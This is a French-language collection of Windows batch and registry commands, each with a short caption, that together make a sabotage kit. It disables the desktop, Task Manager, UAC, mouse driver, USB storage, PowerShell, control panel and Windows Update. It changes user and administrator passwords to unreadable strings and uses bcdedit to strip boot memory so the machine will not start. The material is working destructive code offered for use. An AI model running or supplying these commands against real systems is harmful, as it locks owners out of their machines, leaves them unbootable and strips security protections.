
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
désactive l'affichage du bureau et des icônes
--------------------------------------------------

REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDesktop" /t REG_DWORD /d 1 /f > nul


///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
modifie le fond d'écran windows en noir
-------------------------------------------


REG ADD "HKCU\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "" /f > nul
REG ADD "HKCU\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 2 /f > nul
REG ADD "HKCU\Control Panel\Desktop" /v "ColorizationOpaqueBlend" /t REG_DWORD /d 0 /f > nul
REG ADD "HKCU\Control Panel\Desktop" /v "ColorizationColor" /t REG_DWORD /d 0x000000 /f > nul

rundll32.exe user32.dll, UpdatePerUserSystemParameters > nul

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
désactive le gestionnaire des tâches
-------------------------------------

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
invers click droit et click gauche (swap temporaire)
-----------------------------------------

RUNDLL32 USER32.DLL,SwapMouseButton

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
désactive l'UAC
---------------


%SystemRoot%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f > nul
%SystemRoot%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f > nul
%SystemRoot%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f > nul


///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
désactive le curseur de la souris
---------------------------------


set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete "%key%" /f
reg add "%key%" /v "Start" /t REG_DWORD /d 4 /f
reg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v "CursorBase" /t REG_SZ /d 1 /f > nul

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
changer le mdp utilisateur user et admin
---------------------------------------------


net user %username% FerkdFDTGK532sd6sq2df6sdf3dfjhdfdfsf54sdf5sd6f4

net user %username% Rccxx°+)}])¨m*ù$/*/*</PASSWORD

net user administrator GoofypswdX✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀S𒄆✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀𒀱✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀𒉹࿐ੁ⁂җ✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀۝°Ⓦ✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀✿

net user %username% K✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀A✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀S𒄆✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀𒀱✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀𒉹࿐ੁ⁂җ✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀۝°Ⓦ✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀✿*✿̴̡̡̡̜̪̰̳̳͔̺̬̖͇̝̣̂͋̈̌̀ﾟ‘


///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
désactiver les port pour les clef usb
-----------------------------------------


reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR" /v "Start" /t REG_DWORD /d 4 /f > nul

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies" /v "WriteProtect" /t REG_DWORD /d 1 /f > nul

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
désactivée le menu contextuel du click droit
--------------------------------------------


REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f > nul

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
désactive la console MMC
--------------------------

REG add "HKCU\Software\Policies\Microsoft\MMC\{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 0 /f > nul

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
désactive windows search bar
------------------------------------

REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "SearchboxTaskbarMode" /t REG_DWORD /d 0 /f > nul

REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search" /v "SearchboxTaskbarModeOverride" /t REG_DWORD /d 1 /f > nul


///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Désactive entierement Powershell
---------------------------------
reg add "HKLM\Software\Microsoft\PowerShell\1\ShellIds\ScriptedDiagnostics" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f > nul

reg add "HKLM\Software\WOW6432Node\Microsoft\PowerShell\1\ShellIds\ScriptedDiagnostics" /v "ExecutionPolicy" /t REG_SZ /d "Restricted" /f > nul

reg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v "EnableScripts" /t REG_DWORD /d "0" /f > nul

reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Environment" /v "__PSLockDownPolicy" /t REG_SZ /d "4" /f > nul

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d "1" /f > nul

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "1" /t REG_SZ /d "powershell.exe" /f > nul

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "2" /t REG_SZ /d "powershell_ise.exe" /f > nul

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun" /v "3" /t REG_SZ /d "powershellcustomhost.exe" /f > nul

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

désactive les mAj windows
------------------------
net stop wuauserv
net stop UsoSvc
net stop bits
net stop dosvc
net stop uhssvc
net stop WaaSMedicSvc

sc config wuauserv start= disabled
sc failure wuauserv reset= 0 actions= ""
sc config UsoSvc start= disabled
sc failure UsoSvc reset= 0 actions= ""
sc config uhssvc start= disabled
sc failure uhssvc reset= 0 actions= ""
sc config bits start= disabled
sc failure bits reset= 0 actions= ""
sc config dosvc start= disabled
sc failure dosvc reset= 0 actions= ""

takeown /f C:\Windows\System32\WaaSMedicSvc.dll && icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
rename C:\Windows\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ExcludeWUDriversInQualityUpdate" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DisableWindowsUpdateAccess" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "AllowAutoWindowsUpdateDownloadOverMeteredNetwork" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DisableDualScan" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "AUPowerManagement" /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "SetAutoRestartNotificationDisable" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ManagePreviewBuilds" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "ManagePreviewBuildsPolicyValue" /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferFeatureUpdates" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "BranchReadinessLevel" /t REG_DWORD /d 00000014 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferFeatureUpdatesPeriodInDays" /t REG_DWORD /d 0000016d /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferQualityUpdates" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DeferQualityUpdatesPeriodInDays" /t REG_DWORD /d 00000004 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "SetDisableUXWUAccess" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 00000002 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAUAsDefaultShutdownOption" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAUShutdownOption" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "EnableFeaturedSoftware" /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings" /v "RestartNotificationsAllowed2" /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings" /v "HideMCTLink" /t REG_DWORD /d 00000001 /f
REG DELETE "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v "PreventDeviceMetadataFromNetwork" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v "SusClientId" /t REG_SZ /d "00000000-0000-0000-0000-000000000000" /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableSoftLanding" /t REG_DWORD /d 00000001 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableWindowsConsumerFeatures" /t REG_DWORD /d 00000001 /f

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

limite la ram du boot (empêche le boot)

for /f "skip=1" %%p in ('wmic os get TotalVisibleMemorySize') do ( 
   set system_ram=%%p
   goto :end
)
:end

set /a "c=%system_ram% - 28"
bcdedit.exe /set removememory %c% 




///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

désactive l'accès aux paramètres et au panneau de configuration
------------------------------------------------------------------
REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

